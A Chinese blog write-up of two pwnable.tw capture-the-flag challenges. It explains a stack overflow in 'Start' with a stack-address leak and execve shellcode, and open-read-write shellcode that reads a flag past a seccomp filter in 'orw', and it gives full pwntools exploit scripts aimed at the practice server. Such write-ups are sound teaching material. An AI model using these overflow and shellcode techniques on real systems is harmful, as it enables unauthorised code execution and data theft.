【PWN刷题】Pwnable-Start、Pwnable-orw

已于 2023-05-06 13:46:21 修改
阅读量1.5k 收藏 5
点赞数 22
分类专栏: Pwn刷题之路 文章标签: 安全 网络安全
于 2023-05-03 15:57:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/QYbudong/article/details/130471702
版权

题目来源:https://pwnable.tw/challenge

目录

一、Pwnable-Start

1.检查保护

 2.IDA分析

3.EXP

二、pwnable-orw

1.检查保护

2.IDA分析

3.EXP

一、Pwnable-Start

1.检查保护

入门级题目,保护全关

 2.IDA分析

①只有start和exit两个函数。其中,start函数做了一次<SYS_write>和<SYS_read>

② 漏洞点在<SYS_read>读了0x3C个字符,可以覆盖到ret,如下所示:

    +-----------------+      <----
    |       Let’      |         |     
    +-----------------+         |
    |       s st      |         |
    +-----------------+         |
    |       art       |        14h
    +-----------------+         |
    |       the       |         |
    +-----------------+         |
    |       CTF:      |         |
    +-----------------+      <-----
    |     ret(exit)   |
    +-----------------+
    |    Saved ESP    |
High+-----------------+

③思路:由于未开启NX,考虑使用shellcode。第一轮覆盖ret为0x08048087泄露栈地址;第二轮将shellcode写入栈内,返回地址ret覆盖为栈地址。

关于shellcode的生成有两种方式:

①自己写汇编,用pwntools的asm生成shellcode,如下:

shellcode=asm( "xor ecx,ecx;xor edx,edx ; push edx;push 0x68732f6e;push 0x69622f2f; mov ebx,esp;mov eax,0xb;int 0x80 ")

这里解释一下,0x68732f6e和0x69622f2f组合在一起是hs/nib//,也就是binsh的小端序写法;而0xb,也就是11,是execve的系统调用号。

②在shellcode网站上找合适的,我选用的是Linux/x86 - execve(/bin/bash, [/bin/bash, -p], NULL) - 33 byteshttp://shell-storm.org/shellcode/index.htmlhttp://shell-storm.org/shellcode/index.html

3.EXP

#!/usr/bin/env python3
# coding = utf-8

from pwn import *
context(arch = "i386", os = "linux", log_level = "debug")


#p = process('./start')
p = remote('chall.pwnable.tw',10000)
elf = ELF('./start')
#libc=ELF('./libc.so.6')
#gdb.attach(p, 'b *0x08048060')

shellcode=asm( "xor ecx,ecx;xor edx,edx ; push edx;push 0x68732f6e;push 0x69622f2f; mov ebx,esp;mov eax,0xb;int 0x80 ")
p.recvuntil('CTF:')
p.send(b'a'*20+p32(0x08048087))
ret=u32(p.recv(4)) + 0x14
#shellcode = b'\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80'
payload = b'a' * 20 + p32(ret) + shellcode

p.send(payload)

p.interactive()

二、pwnable-orw

1.检查保护

只开了canary保护

2.IDA分析

①main开头有一个seccomp(),之后是执行我们写入的shellcode

② 其中,seccomp()是用来禁用某些系统调用的。我们这里使用seccomp-tools,发现可以使用open、read、write,也就是我们说的orw:

③思路:打开文件sys_open('/home/orw/flag',0,0),读取文件sys_read(3,flag,0x100),写入标准输出sys_write(1,flag,0x30)。这里可以使用pwntools自带的shellcraft。当然也可以用上边所说的,自己写汇编然后用asm生成shellcode,这种比较标准的函数还是建议用shellcraft,比较方便。

3.EXP

#!/usr/bin/env python3
# coding = utf-8

from pwn import *
context(arch = "i386", os = "linux", log_level = "debug")


#p = process('./orw')
p = remote('chall.pwnable.tw',10001)
elf = ELF('./orw')
#libc=ELF('./libc.so.6')
#gdb.attach(p, 'b *0x08048060')

p.recvuntil('shellcode:')
shellcode = shellcraft.open('/home/orw/flag')
shellcode += shellcraft.read('eax','esp',100)
shellcode += shellcraft.write(1,'esp',100)
payload = asm(shellcode)

p.send(payload)

p.interactive()
QY不懂
关注
  • 22
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 13
    评论
专栏目录
BUUCTF:pwnable_orw
qq_44768749的博客
08-27 1672
BUUCTF:pwnable_orw0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 32位程序,开启了canary保护 0x02 运行 提示输入shellcode 0x03 IDA main函数 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是
BUUCTF-PWN刷题记录-21
weixin_44145820的博客
05-15 680
目录wdb_2018_1st_babyheap(unlink, UAF) wdb_2018_1st_babyheap(unlink, UAF) add的大小固定为0x20 edit机会只有三次 指针悬挂 利用思路如下: 进行几次添加 add(0, (p64(0)+p64(0x31))*2) add(1, 'aaa\n') add(2, 'aaa\n') add(3, 'aaa\n') add(4, '/bin/sh\n') 删除0和1,再删除一次0,此时show(0)能泄露出heap的地址
强网杯2022 pwn 赛题解析——house_of_cat
CoLin的pwn小屋
08-04 3031
强网杯2022 pwn 赛题分析——house_of_cat
[CTF]-PWNORW题型综合解析
2301_79326813的博客
08-04 998
这里使用mmap函数创造了一个内存映射区域从地址0x123000开始,大小位0x1000权限为可写可执行(可读0x1,可写0x2,可执行0x3)设置为私有映射()和匿名映射(MAP_SHAREDMAP_FIXEDMAP_LOCKED将要映射的文件描述符设为-1,表示不关联任何文件剩下的0指的就是偏移量了,没有偏移这里首先初始化将所有系统调用禁用,并且后面使用seccomp_rule_add函数添加了可使用的系统调用。根据64位系统调用号,分别是:read:系统调用号为0。
pwnable start
m0_57754423的博客
01-25 1716
如果有什么不懂的地方,可以在评论区评论哦,看到就会回答的。 拿到附件以后 checksec一下: 32位程序 没有开启任何保护,放入ida中看一下,只有两个函数_start和_exit,这个题目的源码就不是C代码,本身就是汇编代码,: 我们看汇编代码: 大概流程就是 先压栈esp和exit函数地址,然后压栈字符串,我们可以先运行一下这个程序: 中间的五次push应该就是压入的这些字符串。 随后 write系统调用 打印这些字符串,然后 read系统调用 让用户写入数据 write了
pwnable_start
pondzhang的专栏
03-13 357
from pwn import * loacl_elf = ELF("./start") context.arch = loacl_elf.arch #p = process("./start") p = remote("node3.buuoj.cn",28802) #gdb.attach(p, 'b* 0x08048060') #shellcode=asm(shellcraft.sh()) shellcode = asm("xor ecx,ecx;\ xor edx,.
[BUUCTF]PWN——pwnable_start
mcmuyanga的博客
12-05 1195
pwnable_start 附件 步骤: 例行检查,32位程序,什么保护都没开,首先想到的是ret2shellcode的方法 本地试运行一下,看看程序大概的情况 32位ida载入,没法f5,好在汇编不长,看得懂 一开始调用write函数输出了let’s start the ctf,4是write函数的调用号,之后的调用号是3,调用了read函数,我们知道dl这个寄存器是控制输入字符的多少的,也就是所我们可以输入0x3c个字符,也就是执行了 write(1,buf,0x14) read
pwnable_start(write up)
m0_73756460的博客
01-19 187
buu刷题 pwnable_start(write up)
谷歌师兄的leetcode刷题笔记-Pwn-Pad-Arsenal-Tools:适用于Android设备的渗透测试应用
06-30
谷歌师兄的leetcode刷题笔记Pwn Pad 阿森纳工具 大家好, 我正在使用 Pwn Pad 2013(适用于 2012 版 Nexus 7 平板电脑)。 这是我最喜欢的 Android 应用程序列表以及一些 .sh 和 .apk 源和链接。 希望它会对某人有所...
BUUCTF-PWN刷题记录-22
weixin_44145820的博客
05-18 678
目录ciscn_2019_n_2(double free) ciscn_2019_n_2(double free) delete的时候有一个double free漏洞 利用思路: 先用一个double free把0x602060(chunklist)申请出来,这样我们就能先修改里面的指针了,先利用GOT表泄露libc,然后写入__free_hook的地址并使用编辑写入system地址就行 Exp: from pwn import * menu = "Your choice: " def add(con
BUUCTF-PWN刷题记录-17
weixin_44145820的博客
05-06 862
目录nsctf_online_2019_pwn1(堆重叠,_IO_2_1_stdout_泄露libc) nsctf_online_2019_pwn1(堆重叠,_IO_2_1_stdout_泄露libc) 添加没有太大限制,但是会把之前内容清空 删除没有指针悬挂,并且没有show功能 edit有一个off-by-null 利用思路 因为本题的memset清0使得题目变得复杂了一点 进行4次a...
BUUCTF-PWN刷题记录-16
weixin_44145820的博客
05-05 798
目录ciscn_2019_es_5(realloc double free)npuctf_2020_easyheap(off-by-one) ciscn_2019_es_5(realloc double free) 申请没有大小限制,数目上限为10 edit会调用realloc重新申请(其实不会的,因为大小不变) 如果edit就不能show了 看了一下这题没有什么明显漏洞,但是考虑到re...
pwnable.tw-start
qq_35661990的博客
10-05 942
参考了好多文章才能大致理解shellcode 这题开始就有一个大坑 可以看到不同的checksec查看start文件会有不同的结果,就结果而言,GDB-PEDA的checksec很不靠谱。。我根本没有s命名的文件。。 所以,start是一个32位没有开启NX的程序,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行...
pwnable_orw
K1ose的博客
04-23 391
file orw; 32位程序; checksec; IDA pro分析; main函数下可直接执行shellcode; 但是存在沙箱,只能执行open、read、write等几个系统函数; seccomp-tools dump ./orw 显示允许使用的系统调用函数; 这里想的是: open('/flag') read(3,buf,0x66) #这里3是因为一般stdin、stdout、stderr占用了0,1,2; write(1,buf,0x66) #这里1为标准输出; buf可读可写; 这
pwnable_start | Buuoj Pwn
最新发布
ULGANOY的博客
08-15 130
buuoj的pwnable_start题目记录
pwnpwnable_start --只有read和write函数的getshell
question55的博客
02-04 929
addrlenfd'<'LINUX -
pwnable.tw - start
不急不躁
07-08 4147
首先安装 pwntools,在执行pip install --upgrade pwntools时出错 cannot import name main 要修改 /usr/bin/pip from pip import main 为 from pip import __main__ sys.exit(__main__._main()) 再次执行即可 安装 peda git cl...
pwnable.tw第一题start
计算机小白的博客
08-09 5594
这应该是我做的第一道pwn的题了(虽然也是看了很多别人的WriteUp),想了两天,才终于弄清楚了,在这里记录一下。拿到手以后发现是一个ELF文件,就放进kali虚拟机里面运行一下先: 程序启动以后打印一段话,然后让你输入,就完事了。 再放入IDA中,观察: 检测栈有点问题,不能够F5,强行看汇编。。。 5个push是打印出来的那句话, Let’s start the CTF: 下面一句
__va_start
08-28
__va_start是一个宏,用于在C语言中初始化一个指向变长参数的指针。它是通过调用va_start函数来实现的。va_start函数的原型是void va_start(va_list ap, last),其中ap为va_list类型的变量,指向参数的指针,last为最后一个显式声明的参数,用来获取第一个变长参数的位置。通过调用va_start函数,可以将ap指向变长参数的起始位置,以便后续使用va_arg函数来获取变长参数的值。所以__va_start实际上是va_start函数的一个封装。 <span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [Linux 下 va_start、va_end 学习及使用](https://blog.csdn.net/qq_33782617/article/details/112753690)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论 13
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值